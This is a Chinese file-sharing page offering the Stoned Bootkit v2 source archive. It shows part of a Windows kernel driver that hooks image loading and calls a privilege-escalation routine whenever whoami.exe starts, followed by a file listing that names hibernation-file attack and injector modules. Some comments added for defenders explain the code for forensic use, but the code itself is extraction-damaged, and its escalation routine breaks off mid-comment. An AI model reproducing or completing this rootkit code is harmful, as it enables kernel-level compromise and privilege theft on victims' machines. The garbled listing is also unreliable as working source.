
資源簡介

Stoned Bootkit v2 源代碼,附送 Antivirus Tracker complete。從官網上下載的就是這個 zip 了,原汁原味。官網 http://www.stoned-vienna.com/ 不知道為什麼上不了了,這裡算是個存檔吧。一個分,大家懂的..

資源截圖

代碼片段和文件信息


//?Black?Hat?USA?2009?Briefings?“Stoned?Bootkit“?POC
//?.04$?to?Vipin?Kumar


/*?includes?and?included?definitions?*/

#include?“ntddk.h“
#include?“ntdddisk.h“
#include?“windef.h“


/*?forward?declarations?*/
// Prototypes for the two routines defined further down in this listing.
// NotifyRoutine is the callback GsDriverEntry passes to PsSetLoadImageNotifyRoutine;
// PrivilegeEscalation is called from NotifyRoutine when an image path matches.
void?NotifyRoutine(IN?PUNICODE_STRING?FullImageName?IN?HANDLE?ProcessId?IN?PIMAGE_INFO??ImageInfo);
void?PrivilegeEscalation(IN?PVOID?StartContext);

/*?Stoned?Bootkit?framework?includes?*/
// Function numbers of the Stoned framework. Presumably these are FunctionNumber
// values for the StonedCallback pointer that GsDriverEntry receives (confirm
// against the framework sources). Neither is used in the code shown on this page.
#define?SbNotifyDriverLoad????0
#define?SbInstallWindowsHook??2

// Hook kinds, as described by the original trailing comments; presumably the
// values meant for the Type field of the Hook record below.
#define?HookType_Hook?????????0???//?hooking?a?function?=?control?passed?to?hook?then?original?function?is?called????????(before?a?function?is?called)
#define?HookType_Intercept????1???//?intercepting?a?function?=?getting?function?parameters?return?value?and?return?eip???(after?a?function?is?called)

// Hook request record. Judging by the field names it holds the function to hook,
// the replacement routine and a HookType_* value. It is an unnamed struct with a
// single global instance called Hook; nothing in the visible listing fills it in
// or passes it to the framework.
struct
{
??void?*?FunctionName;
??void?*?FunctionHook;
??unsigned?Type;
}?Hook;


/*?the?real?true?driver?entry?point?name?it?always?GsDriverEntry@8?*/

// Driver entry point (the comment above this function says the framework expects
// the name GsDriverEntry@8). Its only visible effect is to register NotifyRoutine
// as a load-image notify callback; it always returns STATUS_SUCCESS.
//
// ModuleAddress and StonedCallback are accepted but never referenced in the body.
//
// NOTE(review): this listing is extraction-damaged (spaces appear as '?', and
// argument separators and some identifier spellings did not survive), so it is
// not compilable as shown.
//
// Defender note: the registration below adds an entry to the kernel's load-image
// callback list. Enumerating that list and checking which module owns each entry
// is a common way to surface components like this one in memory forensics.
NTSTATUS?GsDriverEntry(void?*?ModuleAddress?int?(*?StonedCallback)(unsigned?FunctionNumber?void?*?Param))
{
??object_ATTRIBUTES?objectAttributes;
//??DbgPrint(“\nYour?PC?is?now?Stoned!??..again!\n\n“);
??
??//?create?the?thread
  // The attributes are initialised for a kernel handle, but no thread or other
  // object is created in the code shown; objectAttributes is otherwise unused.
??InitializeobjectAttributes(&objectAttributes?NULL?OBJ_KERNEL_HANDLE?NULL?NULL);

??//?only?act?on?newly?loaded?images?-?which?is?a?safe?method
  // The status returned by the registration call is ignored.
??PsSetLoadImageNotifyRoutine(&NotifyRoutine);
??
??//?at?unload?image?we?should?restore?security?tokens!
  // The line above is a to-do only: no unload or cleanup path is visible, so the
  // callback is never removed and nothing is restored by this listing.
??
??return?STATUS_SUCCESS;
}


/*?disable?further?debug?output?*/
// Object-like macro with an empty replacement: every later DbgPrint(...) in this
// file is reduced to a bare parenthesised expression, so nothing reaches the
// debugger from the routines below.
#define?DbgPrint


/*?check?every?new?loaded?image?if?to?privilege?escalate?*/

// Load-image notify callback registered in GsDriverEntry. For each notification
// it compares the image path against four hard-coded whoami.exe locations and,
// on a match, calls PrivilegeEscalation(NULL).
//
// FullImageName: path of the image being loaded; only ->Buffer is read.
// ProcessId, ImageInfo: not used.
//
// Defender notes:
//  - The trigger list is fixed: HarddiskVolume1..3 under \Windows\System32, plus
//    a "Support Tools" path under \Programme (what looks like a German-locale XP
//    install, per the comment lines below).
//  - The counts 58 and 51 equal the lengths of the literals, so each test is a
//    case-insensitive prefix match rather than an exact match.
//  - ->Buffer is read without checking FullImageName or consulting its Length
//    field. Whether that relates to the crashes the cmd.exe comment mentions is
//    unconfirmed, but it is worth keeping in mind when triaging bugchecks.
//  - PrivilegeEscalation is truncated on this page, so what it changes in the
//    matching process is not shown here.
void?NotifyRoutine(IN?PUNICODE_STRING?FullImageName?IN?HANDLE?ProcessId?IN?PIMAGE_INFO??ImageInfo)
{
  // Produces no output: DbgPrint is defined to nothing just above this function.
??DbgPrint(“Image?Load:?%wZ\n“?FullImageName);
??
//??Image?Load:?\Device\HarddiskVolume1\Windows\system32\cmd.exe??????????????not?recommended?keeps?crashing
//??Image?Load:?\Device\HarddiskVolume1\Windows\System32\whoami.exe???????????Vista
//??Image?Load:?\Device\HarddiskVolume1\Programme\Support?Tools\whoami.exe????XP

??if?(_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume1\\Programme\\Support?Tools\\whoami.exe“?58)?==?0?||
????_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume1\\Windows\\System32\\whoami.exe“?51)?==?0???||
????_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume2\\Windows\\System32\\whoami.exe“?51)?==?0???||
????_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume3\\Windows\\System32\\whoami.exe“?51)?==?0???)
????PrivilegeEscalation(NULL);
}


/*?Vipin?Kumar?Black?Hat?Europe?2007?vbootkit?inspired?privilege?escalation?*/

void?PrivilegeEscalation(IN?PVOID?StartContext)
{
??PEPROCESS?CurrentProcess?ServiceProcess?FirstProcess;
??DWORD?ServiceSecurityToken;
??RTL_OSVERSIONINFOW?OSVersionInfo;
??DWORD?OffsetAPL?OffsetIN?OffsetST;

??CurrentProcess?=?IoGetCurrentProcess();

/*??OS??????????????????????ActiveProcesslink???ImageName???????????SecurityToken
????Windows?2000????

?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件???????83382??2010-06-06?00:29??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.1.zip
?????文件???????86044??2010-06-06?16:12??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.2.zip
?????文件???????97881??2010-08-20?10:23??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.3.zip
?????文件???????20460??2010-02-20?14:55??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.zip
?????文件???????14149??2010-12-20?18:32??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?Files?(Auflistung).txt
?????目錄???????????0??2010-12-20?18:35??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\
?????文件????????5851??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Advanced.txt
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\
?????文件????????2300??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Forensic?Lockdown?Software.asm
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\
?????文件????????6690??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Boot?Menu.asm
?????文件?????????985??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\File?Manager.asm
?????文件?????????967??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Lock?Menu.asm
?????文件????????1916??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Settings.asm
?????文件????????6351??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Shutdown.asm
?????文件???????10810??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Unlock?Menu.asm
?????文件????????9575??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\User?Interface.asm
?????文件????????9342??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\User?Interface.asm
?????文件?????????359??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\release.cmd
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\System?Files\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\
?????文件????????2441??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\BHE2009e.asm
?????文件????????3563??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\Hibernation?File?Attack.asm
?????文件???????29392??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\Injector.asm
?????文件?????????347??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\release.cmd
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\System?Files\
?????文件??????????64??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Boot?Records.bat
............此處省略189個文件信息
